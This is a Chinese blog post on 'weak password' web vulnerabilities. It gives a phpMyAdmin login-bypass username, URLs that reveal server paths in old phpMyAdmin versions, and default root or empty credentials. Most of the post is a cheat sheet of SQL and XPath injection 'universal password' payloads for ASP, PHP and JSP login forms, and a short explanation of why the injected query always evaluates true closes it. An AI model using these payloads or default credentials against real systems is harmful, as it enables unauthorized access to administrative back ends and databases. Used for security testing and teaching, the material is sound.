美文网首页
web漏洞之弱口令

web漏洞之弱口令

作者: 帅猪佩奇 | 来源:发表于2018-12-07 18:16 被阅读9次

    前言:将web漏洞中万能密码也归类于弱口令篇。

    1.phpmyadmin

    phpmyadmin万能密码

    其实应该叫phpmyadmin万能账号,因为是在帐号处输入漏洞信息,而密码不需要输入

    用户名处写入'localhost'@'@"则登录成功,密码无需输入 (全部为英文标点符号)

    phpmyadmin 爆绝对路径

    phpMyAdmin/libraries/select_lang.lib.php

    phpMyAdmin/darkblue_orange/layout.inc.php

    phpMyAdmin/index.php?lang[]=1

    phpmyadmin/themes/darkblue_orange/layout.inc.php

    漏洞影响版本  2.11.4 , 2.11.3

    phpmyadmin弱口令

    phpMyAdmin默认账号密码

    用户名 root

    密码  root

    或空登陆。

    phpmyadmin root空密码

    用户名 root 登陆,无需密码。

    漏洞影响版本 2.11.9.2

    2.web后台站万能密码

    admin'or'1'='1

        'UNION SELECT 1, 'anotheruser', 'doesnt matter', 1–

        "or"a"="a

        'xor

        'or'='or'

        (asp、aspx的万能密码)

    1:"or "a"="a

    2:')or('a'='a

    3:'or'='or'

    4:'or 1=1–

    5:a'or' 1=1–

        6:"or 1=1–

    7:'or'a'='a

    8:"or"="a'='a

    9:'or"='

        10:admin'or'1=1

        11:1 or '1'='1'=1

        12:1 or '1'='1' or 1=1

        13:'OR 1=1%00

        14:'or 1=1%00

        15:'xor

        'or'='or'

        (PHP的万能密码)

        or 1=1/*

        User:something 

        Pass:OR 1=1

        (jsp的万能密码)

        1or1=1

        admin OR 1=1/*

        xpath注入万能密码

        "or 1=1 or "='

    万能密码原理:

    由于一些网站后台输入账号密码未进行字符过滤导致sql注入万能密码

    如下为 登陆源码语句

    select * from user where username='$user' and password ='$pass'

    输入万能密码  'or'1'='1

    select * from user where username=''or '1'='1' and password ='' or'1'='1'

    可以看到 or 直接绕过,使得判断逻辑语句一直为真,对于一些代码可以进行绕过万能密码进入后台,这样SQL返回的值始终为1,就成功绕过了程序的验证。

    相关文章

      网友评论

          本文标题:web漏洞之弱口令

          本文链接:https://www.haomeiwen.com/subject/bmxacqtx.html